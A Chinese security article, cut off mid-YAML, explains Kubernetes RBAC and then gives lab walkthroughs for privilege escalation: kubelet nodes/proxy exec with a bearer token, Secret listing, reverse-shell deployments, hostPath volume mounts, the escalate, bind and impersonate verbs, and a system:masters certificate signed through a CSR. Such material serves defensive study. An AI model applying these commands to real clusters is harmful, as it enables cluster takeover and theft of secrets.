K8S API访问控制之RBAC利用

前言

K8S对于API的访问安全提供了访问控制,主要为4个阶段,本文为第二个阶段——鉴权的RBAC。RBAC是基于角色的访问控制,使用kubeadm安装集群1.6版本以上的都默认开启了RBAC。本文主要研究集群可能存在的利用点及相对应的利用手法。

API访问控制

K8S的API访问控制就是通过如 kubectl、构造REST请求,去访问K8S的API,请求到达API时经历的多个阶段就是K8S的API访问控制,而RBAC就是其中鉴权的部分,并且是现在的主要方式,kubeadm安装的集群从1.6版本以后都默认开启了RBAC和Node的鉴权方式。

图片

图 API访问控制的流程[1]

 

RBAC-基于角色的访问控制

RBAC[2]就是基于角色(Role)的访问控制,是一种基于组织中用户的角色来调节控制对计算机或网络资源的访问的方法。RBAC 鉴权机制使用rbac.authorization.k8s.io API 组[3]来驱动鉴权决定,允许通过 K8S API 动态配置策略。要启用 RBAC,在启动 API 服务器时将--authorization-mode参数设置为一个逗号分隔的列表并确保其中包含 RBAC。

kube-apiserver --authorization-mode=Node,RBAC --<其他选项> --<其他选项>

API对象

RBAC API 声明了四种 K8S 对象:Role、ClusterRole、RoleBinding 和 ClusterRoleBinding。

Role和ClusterRole

RBAC 的 Role 或 ClusterRole 中包含一组代表相关权限的规则。这些权限是纯粹累加的(不存在拒绝某操作的规则)。如果你希望在名字空间内定义角色,应该使用 Role;如果你希望定义集群范围的角色,应该使用 ClusterRole。Role 或 ClusterRole 对象的名称必须是合法的路径分段名称[4]。

Role

Role主要用来设置命名空间的访问权限,在创建时必须指定namespace。下面是一个位于 "default" 命名空间的 Role 的示例,可用来授予对 Pod[5] 的读访问权限:

apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:namespace: defaultname: pod-reader
rules:
- apiGroups: [""] # "" 标明 core API 组resources: ["pods"]verbs: ["get", "watch", "list"]

ClusterRole

ClusterRole 则是一个集群作用域的资源。这两种资源的名字不同(Role 和 ClusterRole) 是因为 K8S 对象要么是名字空间作用域的,要么是集群作用域的,不可两者兼具。

ClusterRole 有若干用法。你可以用它来:

  1. 1. 定义对某名字空间域对象的访问权限,并将在个别名字空间内被授予访问权限;

  2. 2. 为名字空间作用域的对象设置访问权限,并被授予跨所有名字空间的访问权限;

  3. 3. 为集群作用域的资源定义访问权限。

ClusterRole 同样可以用于授予 Role 能够授予的权限。因为 ClusterRole 属于集群范围,所以它也可以为以下资源授予访问权限:

  • • 集群范围资源(比如节点(Node)[6]);

  • • 非资源端点(比如 /healthz);

  • • 跨名字空间访问的名字空间作用域的资源(如 Pod)比如,你可以使用 ClusterRole 来允许某特定用户执行 kubectl get pods --all-namespaces

下面是一个 ClusterRole 的示例,可用来为任一特定名字空间中的 Secret[7] 授予读访问权限, 或者跨名字空间的访问权限:

apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
# "namespace" 被忽略,因为 ClusterRoles 不受名字空间限制
name: secret-reader
rules:
- apiGroups: [""]
# 在 HTTP 层面,用来访问 Secret 资源的名称为 "secrets"
resources: ["secrets"]
verbs: ["get", "watch", "list"]

RoleBinding和CluserRoleBinding

角色绑定(Role Binding)是将角色中定义的权限赋予一个或者一组用户。它包含若干 主体(用户、组或服务账户)的列表和对这些主体所获得的角色的引用。RoleBinding 在指定的名字空间中执行授权,而 ClusterRoleBinding 在集群范围执行授权。RoleBinding 或 ClusterRoleBinding 对象的名称必须是合法的路径分段名称。

RoleBinding

一个 RoleBinding 可以引用同一的名字空间中的任何 Role。或者,一个 RoleBinding 可以引用某 ClusterRole 并将该 ClusterRole 绑定到 RoleBinding 所在的名字空间。下面的例子中的 RoleBinding 将 "pod-reader" Role 授予在 "default" 名字空间中的用户 "jane"。这样,用户 "jane" 就具有了读取 "default" 名字空间中所有 Pod 的权限。

apiVersion: rbac.authorization.k8s.io/v1
# 此角色绑定允许 "jane" 读取 "default" 名字空间中的 Pod
# 你需要在该命名空间中有一个名为 “pod-reader” 的 Role
kind: RoleBinding
metadata:name: read-podsnamespace: default
subjects:
# 你可以指定不止一个“subject(主体)”
- kind: Username: jane # "name" 是区分大小写的apiGroup: rbac.authorization.k8s.io
roleRef:# "roleRef" 指定与某 Role 或 ClusterRole 的绑定关系kind: Role        # 此字段必须是 Role 或 ClusterRolename: pod-reader  # 此字段必须与你要绑定的 Role 或 ClusterRole 的名称匹配apiGroup: rbac.authorization.k8s.io

RoleBinding 也可以引用 ClusterRole,以将对应 ClusterRole 中定义的访问权限授予 RoleBinding 所在名字空间的资源。这种引用使得你可以跨整个集群定义一组通用的角色, 之后在多个名字空间中复用。例如,尽管下面的 RoleBinding 引用的是一个 ClusterRole,"dave"(这里的主体, 区分大小写)只能访问 "development" 名字空间中的 Secrets 对象,因为 RoleBinding 所在的名字空间(由其 metadata 决定)是 "development"。

apiVersion: rbac.authorization.k8s.io/v1
# 此角色绑定使得用户 "dave" 能够读取 "development" 名字空间中的 Secrets
# 你需要一个名为 "secret-reader" 的 ClusterRole
kind: RoleBinding
metadata:name: read-secrets# RoleBinding 的名字空间决定了访问权限的授予范围。# 这里隐含授权仅在 "development" 名字空间内的访问权限。namespace: development
subjects:
- kind: Username: dave # 'name' 是区分大小写的apiGroup: rbac.authorization.k8s.io
roleRef:kind: ClusterRolename: secret-readerapiGroup: rbac.authorization.k8s.io

ClusterRoleBinding

如果希望ClusterRole绑定到集群的所有命名空间,需要使用ClusterRoleBinding 要跨整个集群完成访问权限的授予,你可以使用一个 ClusterRoleBinding。下面的 ClusterRoleBinding 允许 "manager" 组内的所有用户访问任何名字空间中的 Secret。

apiVersion: rbac.authorization.k8s.io/v1
# 此集群角色绑定允许 “manager” 组中的任何人访问任何名字空间中的 Secret 资源
kind: ClusterRoleBinding
metadata:name: read-secrets-global
subjects:
- kind: Groupname: manager      # 'name' 是区分大小写的apiGroup: rbac.authorization.k8s.io
roleRef:kind: ClusterRolename: secret-readerapiGroup: rbac.authorization.k8s.io

 

创建了绑定之后,你不能再修改绑定对象所引用的 Role 或 ClusterRole。试图改变绑定对象的 roleRef 将导致合法性检查错误。如果你想要改变现有绑定对象中 roleRef 字段的内容,必须删除重新创建绑定对象。这种限制有两个主要原因:

  1. 1. 将 roleRef 设置为不可以改变,这使得可以为用户授予对现有绑定对象的 update 权限, 这样可以让他们管理主体列表,同时不能更改被授予这些主体的角色。

  2. 2. 针对不同角色的绑定是完全不一样的绑定。要求通过删除/重建绑定来更改 roleRef, 这样可以确保要赋予绑定的所有主体会被授予新的角色(而不是在允许或者不小心修改了 roleRef 的情况下导致所有现有主体未经验证即被授予新角色对应的权限)。

命令 kubectl auth reconcile 可以创建或者更新包含 RBAC 对象的清单文件, 并且在必要的情况下删除和重新创建绑定对象,以改变所引用的角色。

Nodes/proxy

在k8s集群中,每个节点上10250端口是每个节点的kubelet开启的,主要用来接收kube-apiserver发送的api然后在节点上执行相关操作。当RBAC配置为对资源为nodes/proxy,verbs包含"get" "create"时就可以绕过apiserver直接对每个节点操作,当知道每个节点ip时,相当于获得了集群的每个节点的权限。首先创建需要的相关资源:

  • ServiceAccount

  • Secret

  • ClusterRole

  • ClusterRoleBinding

1. 创建服务账户用来将ClusterRoleBinding角色绑定。

apiVersion: v1
kind: ServiceAccount
metadata:name: nodeproxynamespace: default

2.手动创建服务账户的Secret自动生成Token,令牌控制器将清理不存在的服务账号的所有令牌。

apiVersion: v1
kind: Secret
metadata:name: nodeproxy-tokenannotations:kubernetes.io/service-account.name: nodeproxy
type: kubernetes.io/service-account-token

3. 创建集群角色,并授予对nodes/proxy资源的权限。

apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:name: nodeproxy
rules:
- apiGroups: [""]resources: ["nodes/proxy"]verbs: ["get", "create"]

4. 创建ClusterRoleBinding将集群角色中定义的权限赋予之前创建的服务账户。

apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:name: nodeproxybinding
subjects:
- kind: ServiceAccountname: nodeproxynamespace: default
roleRef:kind: ClusterRolename: nodeproxyapiGroup: rbac.authorization.k8s.io

资源创建过程完成后,测试利用如下:

  1. 获取刚才创建的服务账户的token。

$ kubectl get secrets build-nodeproxy -o jsonpath={.data.token} | base64 -d
eyJhbGciOiJSUzI1NiIsImtpZCI6IkpBS09mWHo0cU55bWI3NVV6cW4yQVV2MXFaUTJRX2tualZqeV9PbDVIOFEifQ.eyJpc3MiOiJrdWJlcm5ldGVzL3NlcnZpY2VhY2NvdW50Iiwia3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9uYW1lc3BhY2UiOiJkZWZhdWx0Iiwia3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9zZWNyZXQubmFtZSI6ImJ1aWxkLW5vZGVwcm94eSIsImt1YmVybmV0ZXMuaW8vc2VydmljZWFjY291bnQvc2VydmljZS1hY2NvdW50Lm5hbWUiOiJub2RlcHJveHkiLCJrdWJlcm5ldGVzLmlvL3NlcnZpY2VhY2NvdW50L3NlcnZpY2UtYWNjb3VudC51aWQiOiJkYzU1ODc4YS0xM2ZiLTRiZjUtODFiMy0xNGI4NjczOGI1YjIiLCJzdWIiOiJzeXN0ZW06c2VydmljZWFjY291bnQ6ZGVmYXVsdDpub2RlcHJveHkifQ.DGUoIpe6-kNiUQW0USApR6kwLhiuVIYuHdwYRWdHArqYEEhcG8WNMNOAK-cMu0i9v69xplNLAwWFFIjjOsWtgrKzOih8M39Wyfgmha9_D9YqOJCPLwLRAuxlBPXGmkM_hEcEQ7ockh5a9GGRS5Q3E45KhofZR44QqlaDyoYyxUd7M8m4-Kss_m7otNyh39Q6dDug5dOBIcV1Tk6hPye3XqPAGQ0y_nAtZY9k2GZENeODzwYiEW1LOJ9bJbJI62Qo_rvPB6CFYRt4TnQFsrPwFhfQKeIOIKowoqfz1rBmYCSNrBAkdVbQ-ZvmkAsOz704l6oati_K6Pq_q3VL-Zgb2A
  1. 使用curl或者任意可以发送api的工具查看pods并将token放进header的Authorization中,可以通过jless过滤json查看获取信息:

  • namespace

  • pod-name

  • container-name

$ curl -k -H "Authorization: Bearer eyJhbGciOiJSUzI1NiIsImtpZCI6IkpBS09mWHo0cU55bWI3NVV6cW4yQVV2MXFaUTJRX2tualZqeV9PbDVIOFEifQ.eyJpc3MiOiJrdWJlcm5ldGVzL3NlcnZpY2VhY2NvdW50Iiwia3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9uYW1lc3BhY2UiOiJkZWZhdWx0Iiwia3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9zZWNyZXQubmFtZSI6ImJ1aWxkLW5vZGVwcm94eSIsImt1YmVybmV0ZXMuaW8vc2VydmljZWFjY291bnQvc2VydmljZS1hY2NvdW50Lm5hbWUiOiJub2RlcHJveHkiLCJrdWJlcm5ldGVzLmlvL3NlcnZpY2VhY2NvdW50L3NlcnZpY2UtYWNjb3VudC51aWQiOiJkYzU1ODc4YS0xM2ZiLTRiZjUtODFiMy0xNGI4NjczOGI1YjIiLCJzdWIiOiJzeXN0ZW06c2VydmljZWFjY291bnQ6ZGVmYXVsdDpub2RlcHJveHkifQ.DGUoIpe6-kNiUQW0USApR6kwLhiuVIYuHdwYRWdHArqYEEhcG8WNMNOAK-cMu0i9v69xplNLAwWFFIjjOsWtgrKzOih8M39Wyfgmha9_D9YqOJCPLwLRAuxlBPXGmkM_hEcEQ7ockh5a9GGRS5Q3E45KhofZR44QqlaDyoYyxUd7M8m4-Kss_m7otNyh39Q6dDug5dOBIcV1Tk6hPye3XqPAGQ0y_nAtZY9k2GZENeODzwYiEW1LOJ9bJbJI62Qo_rvPB6CFYRt4TnQFsrPwFhfQKeIOIKowoqfz1rBmYCSNrBAkdVbQ-ZvmkAsOz704l6oati_K6Pq_q3VL-Zgb2A" https://192.168.56.10:10250/pods | jless

图片

 

  1. 3. 根据获取到的信息通过https://ip:10250/run/namespace/pod-name/container-nameapi执行命令。

图片

 

后面的流程可以通过信息收集获得master的ip,然后找到kube-proxy,反弹shell然后逃逸获得master主机权限,从而获得cluster admin权限。

列举Secret

当RBAC允许对Secrets执行的verb包括get、list、watch的情况下,被授权用户可以获取Secret的具体内容,不同的主体可能不同,或者是Role或者ClusterRole的也不同。首先测试Role,相关资源创建:

  • • ServiceAccount

  • • Secret

  • • Role

  • • RoleBinding

apiVersion: v1
kind: ServiceAccount
metadata:name: secret-list-sa
automountServiceAccountToken: true
---
apiVersion: v1
kind: Secret
metadata:name: secret-list-buildannotations:kubernetes.io/service-account.name: secret-list-sa
type: kubernetes.io/service-account-token
---
apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:name: secret-list-role
rules:
- apiGroups: [""]resources: ["secrets"]verbs: ["get", "list"]
---
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:name: secret-list-binding
subjects:
- kind: ServiceAccountname: secret-list-sanamespace: default
roleRef:kind: Rolename: secret-list-roleapiGroup: rbac.authorization.k8s.io

相关api:

# 读取指定的 Secret
GET /api/v1/namespaces/{namespace}/secrets/{name}
# 列出指定命名空间下为 Secret 的对象
GET /api/v1/namespaces/{namespace}/secrets
# 列出 Secret 对象
GET /api/v1/secrets

获取sa的token,利用list权限发送api到master测试。

$ kubectl get secrets secret-list-build -ojsonpath={.data.token} | base64 -d
eyJhbGciOiJSUzI1NiIsImtpZCI6IkpBS09mWHo0cU55bWI3NVV6cW4yQVV2MXFaUTJRX2tualZqeV9PbDVIOFEifQ.eyJpc3MiOiJrdWJlcm5ldGVzL3NlcnZpY2VhY2NvdW50Iiwia3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9uYW1lc3BhY2UiOiJkZWZhdWx0Iiwia3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9zZWNyZXQubmFtZSI6InNlY3JldC1saXN0LWJ1aWxkIiwia3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9zZXJ2aWNlLWFjY291bnQubmFtZSI6InNlY3JldC1saXN0LXNhIiwia3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9zZXJ2aWNlLWFjY291bnQudWlkIjoiMWIwYmNiMjAtNThkNS00ZjAxLTljNDUtZTdlYzM4NjA0MTYzIiwic3ViIjoic3lzdGVtOnNlcnZpY2VhY2NvdW50OmRlZmF1bHQ6c2VjcmV0LWxpc3Qtc2EifQ.gTG8uTOn-zMO1BmYNNaTT2rx_qSAsWNKstRlzOmHJtqGwzUaNR65KRjE102r52rsUIxnfZL2ySr_G-Dg66MaxcGIVJtZZZFfsfE-LsDkSpPgJvTGVEyl3glL3jHDho39CYygPw8G1bPk-_w7kXFPjo476efT2_YUwwNh1xgQ_kwuD3Fo-ajFETvxv7tvnYYizWYjw7XU7EZkpBDamkqJFKmYpKGG1Atc7inm9LE5qB2DOKvxyqXyWvsT5TcubJEfC6BzN3MzzLa6sKcUpbPAdrM6HWiYTnkLKjIonzaWJZaoRvB67klyapikl1cPorrOFHQNYbimuneO6hOLOXdgeg
$ curl -k -H "Authorization: Bearer eyJhbGciOiJSUzI1NiIsImtpZCI6IkpBS09mWHo0cU55bWI3NVV6cW4yQVV2MXFaUTJRX2tualZqeV9PbDVIOFEifQ.eyJpc3MiOiJrdWJlcm5ldGVzL3NlcnZpY2VhY2NvdW50Iiwia3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9uYW1lc3BhY2UiOiJkZWZhdWx0Iiwia3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9zZWNyZXQubmFtZSI6InNlY3JldC1saXN0LWJ1aWxkIiwia3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9zZXJ2aWNlLWFjY291bnQubmFtZSI6InNlY3JldC1saXN0LXNhIiwia3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9zZXJ2aWNlLWFjY291bnQudWlkIjoiOWYyOGRmZmEtYTE4Yy00OThmLTg5NzMtNzU4MTA0MTNiZDU2Iiwic3ViIjoic3lzdGVtOnNlcnZpY2VhY2NvdW50OmRlZmF1bHQ6c2VjcmV0LWxpc3Qtc2EifQ.KEzhwM3hW7jGS4tBQLSfHg0IL42BOacGJvlpy0HCW7VtAVBHN2-Hs31nHdTvbiXTH5QX7XdCb_wPBlDfx9WZQBSfpaV7RZGcDTvi4rg6E0JQyIyBFk5oBYe0WYLWrPHTcrcCx8uKojoz6KRHytSpAsu2B0oSDayVy8B55ByFlTqCccZ-qjCXv22myZqNpV2WGtP3iQ_b4WKwQHMZ3RWeD_PwTWCddkvZCuvWMJiltIgQeVmmlX-nFPK7X1N81qbi0DlQapoXIAMLqwjS7Ungct3kSQIIr_oEZ3CJusyEAxQfpvpBmHf3lsLYlgpFNNERJz4Vq1sxFXbF0bAgw8HXmg" https://192.168.56.10:6443/api/v1/namespaces/default/secrets/

查看default命名空间下的没问题。

图片

 

但是进一步利用查看kube-system下的不可以,显示403说明使用Role如果不指定对应的命名空间是无法获取的。

图片

 

由于ClusterRole的机制,哪怕主体不同可以是组、用户还是服务账户主要还是看绑定的角色,虽然sa是default下的,但是通过绑定ClusterRole可以查看kube-system下的Secret,由于Role规定再创建时必须指定命名空间,除非指定kube-system否则无法查看,而ClusterRole就利用机会很大了;获取到关键Secrets可以进一步利用。

创建工作负载

当被允许创建工作负载(Pod、Deployments、DaemonSet等)资源时,该权限其实还授予了对该命名空间中许多其他资源的权限,比如在Pod中挂载Secret、ConfigMap、PV等。由于ServiceAccount其实是为Pod中运行的进程提供了一个身份,所以Pod内的进程可以使用其关联的sa的身份,来向Cluster的api-server访问,所以授予创建工作负载的权限的同时也授予了命名空间下任何sa对api-server的访问权限。

如果RBAC的资源允许对Deployments、DaemonSet等操作,我们可以通过批量创建特权Pod来达到k8s内横向并持久化,获取Cluster Admin权限,以及所有node的权限。

针对Deployments的利用创建需要的资源:

  • Role

  • RoleBinding

apiVersion: rbac.authorization.k8s.io/v1
kind: Role 
metadata:name: pod-role
rules:
- apiGroups: ["apps"]resources: ["deployments"]verbs: ["get", "list", "watch", "create", "update", "patch", "delete"]
---
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:name: pod-binding
subjects:
- kind: Username: k8s-userapiGroup: rbac.authorization.k8s.io
roleRef:kind: Rolename: pod-roleapiGroup: rbac.authorization.k8s.io

用户被绑定Role后测试可以get命名空间为default下的deployments.apps资源。

图片

 

其他命名空间下的是的不能看的,Role未指定namespace的情况默认为default 这边尝试创建一个deployments.apps,在containers中填写spec反弹shell。

图片

 

图片

 

成功反弹,在只有default命名空间对deployments操作的权限下,在所有节点创建pod并反弹,这里只是举例container的image使用nginx,实际中可以使用恶意镜像,为了隐蔽建议使用kube-proxy,因为每个节点本身都有这个镜像,并且本身可以逃逸到宿主机上。将Role改为ClusterRole,自然也是可以的,并且在未指定namespace的情况下是可以查看整个集群的,可以利用一些更隐蔽点。

创建持久卷

持久卷(PersistentVolume)是k8s中用来存储的,可以理解为一块虚拟硬盘,一般持久卷是集群管理员事先创建好的,或者使用存储类动态创建,对于pod而言不直接使用pv,而是通过pvc作为存储卷匹配符合需求的pv使用的,所以一般用户不会授予针对pv的创建权限,可以通过创建pv访问node上所有的数据,达到提权的目的。

在 Kubernetes 中,存储卷是由容器使用的,所以它不能直接写入数据。如果想要写入数据,需要在 Kubernetes 集群中创建容器,并将存储卷挂载到容器中。然后,通过容器提供的接口来写入数据。

当用户创建工作负载的权限时,不需要创建pv的权限就可以直接使用存储卷,比如使用本地存储hostPath配置容忍度结合nodeSelector达到挂载任意node。利用前提拥有对pv、pvc、pod创建权限,利用相关的声明配置文件:

apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole 
metadata:name: pv-role
rules:
- apiGroups: [""]resources: ["persistentvolumes", "persistentvolumesclaims", "pods"]verbs: ["get", "list", "watch", "create"]
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:name: pv-binding
subjects:
- kind: Username: k8s-userapiGroup: rbac.authorization.k8s.io
roleRef:kind: ClusterRolename: pv-roleapiGroup: rbac.authorization.k8s.io
---
apiVersion: v1
kind: PersistentVolume
metadata:name: local-pv
spec:capacity:storage: 4GivolumeMode: FilesystemaccessModes:- ReadWriteOncepersistentVolumeReclaimPolicy: DeletestorageClassName: local-storagelocal:path: /rootnodeAffinity:required:nodeSelectorTerms:- matchExpressions:- key: kubernetes.io/hostnameoperator: Invalues:- k8s-worker1
---
apiVersion: v1
kind: PersistentVolumeClaim
metadata:name: local-pv-claim
spec:storageClassName: local-storageaccessModes:- ReadWriteOnceresources:requests:storage: 3Gi
---
apiVersion: v1
kind: Pod
metadata:name: test-pd
spec:containers:- image: nginx:1.22name: test-containervolumeMounts:- mountPath: /test-pdname: test-pv-volumevolumes:- name: test-pv-volumepersistentVolumeClaim:claimName: local-pv-claim

Esclate verb

RBAC本身是一种鉴权机制,是为了整个集群更加安全的,RBAC会阻止用户创建比它本身拥有更多权限的Role或者ClusterRole,但是在verb中escalate是一个例外,拥有这个verb的用户可以用来提权。

目前k8s-user拥有针对pods的相关权限,但是对于secrets并无权限。

图片

 

创建一个对于roles拥有verb为escalate的Role。

apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:name: role-escalate
rules:
- apiGroups: ["rbac.authorization.k8s.io"]resources: ["roles"]verbs: ["get", "list", "create", "escalate"]

该用户拥有了查看role的权限。

图片

 

尝试使用k8s-user用户创建一个针对secrets的Role。

图片

 

成功创建了一个k8s-user用户本身也不具有查看secrets的Role,如果该用户一开始就具有对roles的patch权限的话,我们可以对该用户的Role直接修改。

 

图片

 

图片

 

图片

 

修改成功,目前该用户可以查看secrets。目前escalate只能针对相关范围的,Role的只能操作相关命名空间作用域的,ClusterRole可以操作命名空间或者集群的,具体看resources是那个的。

Bind verb

bind和esclate类似,拥有该权限的用户也可以进行提权操作,只不过这个操作的是直接绑定自己没有权限的角色,比如下面这个yaml。

apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:name: role-grantor
rules:
- apiGroups: ["rbac.authorization.k8s.io"]resources: ["rolebindings"]verbs: ["create"]
- apiGroups: ["rbac.authorization.k8s.io"]resources: ["clusterroles"]verbs: ["bind"]
---
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:name: role-binding
subjects:
- kind: Username: k8s-userapiGroup: rbac.authorization.k8s.io
roleRef:kind: ClusterRolename: role-grantorapiGroup: rbac.authorization.k8s.io

该yaml创建了一个ClusterRole,拥有对rolebindings的create权限,对clusterroles的bind权限;创建了一个RoleBinding将刚才创建的ClusterRole绑定到了K8S-user上,目前该用户拥有了创建一个RoleBinding然后将自己绑定在高权限的ClusterRole上达到提权的效果。目前该用户还未提权时,不能查看configmaps。

图片

 

通过创建RoleBinding提权。

$ kubectl create rolebinding bind-admin --clusterrole=admin --user=k8s-user
# or
# 不能使用apply,因为apply是先get再create,因为没有get权限
$ kubectl create -f - <<EOF
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:name: bind-admin
subjects:
- kind: Username: k8s-userapiGroup: rbac.authorization.k8s.io
roleRef:kind: ClusterRolename: adminapiGroup: rbac.authorization.k8s.io
EOF

提权成功现在可以查看configmaps。

图片

 

由于该用户只有对rolebindings的权限,并且绑定的是admin,所以对于集权作用域的还是没有权限。

图片

 

想要获得针对整个集群完全的提权还是需要对clusterrolebinding的权限,绑定cluster-admin。

图片

 

Impersonate verb

该动词有点类似于Linux下的sudo,通过该动词用户可以达到扮演其他用户的效果,获得相关用户的权限,其原理主要就是通过请求api-server的时候,通过指定http header实现扮演用户的效果。相关subjects举例:

  • Impersonate-User: 扮演的用户的用户名

  • Impersonate-Group: 扮演的用户组,多个值(出现多次)表示多个组,需要同时指定 Impersonate-User

  • Impersonate-Extra-( extra name ): 动态指定的 key,用于指定用户的其他信息,需要同时指定 Impersonate-User

Impersonate-User: jane.doe@example.com
Impersonate-Group: developers
Impersonate-Group: admins
Impersonate-Extra-dn: cn=jane,ou=engineers,dc=example,dc=com
Impersonate-Extra-acme.com%2Fproject: some-project
Impersonate-Extra-scopes: view
Impersonate-Extra-scopes: development

扮演其他角色可以使用kubectl或者curl发送api kubectl 命令的 --as 可以配置 Impersonate-User 的值, --as-group 可以配置 Impersonate-Group 的值。

kubectl --as <user-to-impersonate> ...
kubectl --as <user-to-impersonate> --as-group <group-to-impersonate> ...# eg
kubectl --as=system:serviceaccount:kube-system:default
kubectl --as=superman --as-group=system:masters# curl
curl -k -v -XGET -H 'Authorization: Bearer ***' \
-H 'Impersonate-User: ***' \
-H 'Impersonate-Group: ***' \'https://<master_ip>:<port>/api/v1/nodes' | jless

以下是一个可以扮演 user、group、serviceaccount的ClusterRole例子:

apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:name: impersonate-verb
rules:
- apiGroups: [""]resources: ["users", "groups", "serviceaccounts"]verbs: ["impersonate"]

对于Impersonate-Extra-scopes的设置也是需要相应的ClusterRole。

apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:name: scopes-impersonator
rules:
# Can set "Impersonate-Extra-scopes" header.
- apiGroups: ["authentication.k8s.io"]resources: ["userextras/scopes"]verbs: ["impersonate"]

通过kubectl,user-to-impersonate可以随便填写,group-to-impersonate填写system:masters可以获得集群权限。

图片

CSR和签发证书

在访问网站时,如果该网站的证书没有被受信任的证书颁发机构签名,那么将收到对于该网站不信任的告警,K8S中的客户端使用证书的身份验证,比如api-server和kubelet之前的通信等。

CSR(CertificateSigningRequest)就是用来向指定的签名者申请证书签名,而CSR API是一种无需访问证书颁发机构就可签名的方式,CSR API允许通过具有相关RBAC权限的用户将CSR发送到kubernetes中批准。

K8S提供了内置的签名者,每一个签名者有一个signerName,其中kubernetes.io/kube-apiserver-client-kubelet签名的证书被 kube-apiserver 视为客户证书用来内部组件使用,而kubernetes.io/kube-apiserver-client签名的证书可以向 K8S API 服务器进行身份验证。

当RBAC授予用户对于create CSR 的权限和 update certificatesigningrequests/approval 的权限, 其中签名者是 kubernetes.io/kube-apiserver-client的情况下可以利用提权。

这是一个已经拥有相关RBAC权限的yaml,具有创建、检索、批准、签名CSR的权限。

apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:name: csr
rules:
- apiGroups: ["certificates.k8s.io"]resources: ["certificatesigningrequests"]verbs: ["create", "get", "list", "watch"]
- apiGroups: ["certificates.k8s.io"]resources: ["certificatesigningrequests/approval"]verbs: ["update"]
- apiGroups: ["certificates.k8s.io"]resources: ["certificatesigningrequests/status"]verbs: ["update"]
- apiGroups: ["certificates.k8s.io"]resources: ["signers"]verbs: ["approve", "sign"]

添加到system:masters 组的用户会默认绑定到cluster-admin角色,该组内的成员具有集群的完全控制权限,首先尝试创建一个该组的证书进行利用直接获取集群管理员权限。

# 生成PKI私钥和CSR,设置CSR的CN和O,CN表示用户名,O表示该用户的组
openssl genrsa -out csr-test.key 2048
openssl req -new -key csr-test.key -out csr-test.csr -subj "/O=system:masters/CN=csr-test"

创建CSR并通过kubectl提交到集群。

  • usage: 必须是client auth

  • expirationSeconds: 表示时间864000为10天,3600是一小时

  • request: 是CSR文件的base64编码,可以通过cat csr-test.csr | base64 | tr -d "\n"获取该值

kubectl apply -f - <<EOF
apiVersion: certificates.k8s.io/v1
kind: CertificateSigningRequest
metadata:name: csr-test
spec:request: LS0tLS1CRUdJTiBDRVJUSUZJQ0FURSBSRVFVRVNULS0tLS0KTUlJQ2NUQ0NBVmtDQVFBd0xERVhNQlVHQTFVRUNnd09jM2x6ZEdWdE9tMWhjM1JsY25NeEVUQVBCZ05WQkFNTQpDR056Y2kxMFpYTjBNSUlCSWpBTkJna3Foa2lHOXcwQkFRRUZBQU9DQVE4QU1JSUJDZ0tDQVFFQTJnRGU4bTNICmlGSEowSDNoeksyVlJtUkJkaHB5SjQ5SXNqNHJmMmV1SGVSVlk5VmpYU1d2UlRHQTBHTGg2QmlMeTBYQjZiSmsKUFgrSE85THVNZDVQK1VhMEhiRUF0eDBLQ00wclhZYWRGVDk1UU5jY2s3UWRBTzE1dXZNU042OTlaVmxIYnVqTApuYTBkdFVsaWhEdWtqM0NxaFpHeHlBOENMSG12SUN1YlYzaUZzb0FmT1FKTHVrMVc5SXJkdXI2MW1vZjc2UUYzCnlESFMyMSs2K3ZNZG5PMG8vK3JxOFE5SFdicUs0SGJUOWpSTzdOb2p3OFkzK3RRVGNITE9DZnZnZ0I2b3RsMWkKN1R2KzhESS9QNFF0TDNZL1RyODJRSEovNHpVWkRkelNvL3pTSDRyaS9xclhBMDQvQzFyMVphZk9nSVMvRHk2VwpPMnhGZlRZRndRbXZiUUlEQVFBQm9BQXdEUVlKS29aSWh2Y05BUUVMQlFBRGdnRUJBTmZzQzdVTDV4SHZnYkRrCmc2UG9pODVmWS9SNmhIQmdkS1NIODNzdmZIcnR0dEQzRG9TVWp0S2hrZ3o5bU9yQmlkdWgza0pvd2M4Q0NJVE8KS0MzV1V6RzJ0ekdtTlVFeFFpUmUveTdTQUZEaHRtUUF4WjJiS3huN3NkNTR3MG5JRTNlMXpYRXh2bC9YcXB4egpoQ0M2RzkvcVNYb3VMQzZKTlNobFVMVFU3SjNQZmtKeHRFVHhhTXBYL1dwclVoR0hEUW55TTFwMUtGMko5UFEvCkQ2cFRnMWJQbjVHRmpXdEZuUkU5TnVVbWhCTVRvR0xESWh3cTdrdnZadHRGSFNmTFJudmlJUnRKUlRQb2llbnMKbDZPcVBhazhDd2pVL1MwWEVON0wrbEl1Sjl0WUdUbmtJdWxvSUQ0R1NEZTRiWmt1ZWVYUWhRaW1LdmxFdUdaawo1SHA0QVBzPQotLS0tLUVORCBDRVJUSUZJQ0FURSBSRVFVRVNULS0tLS0KsignerName: 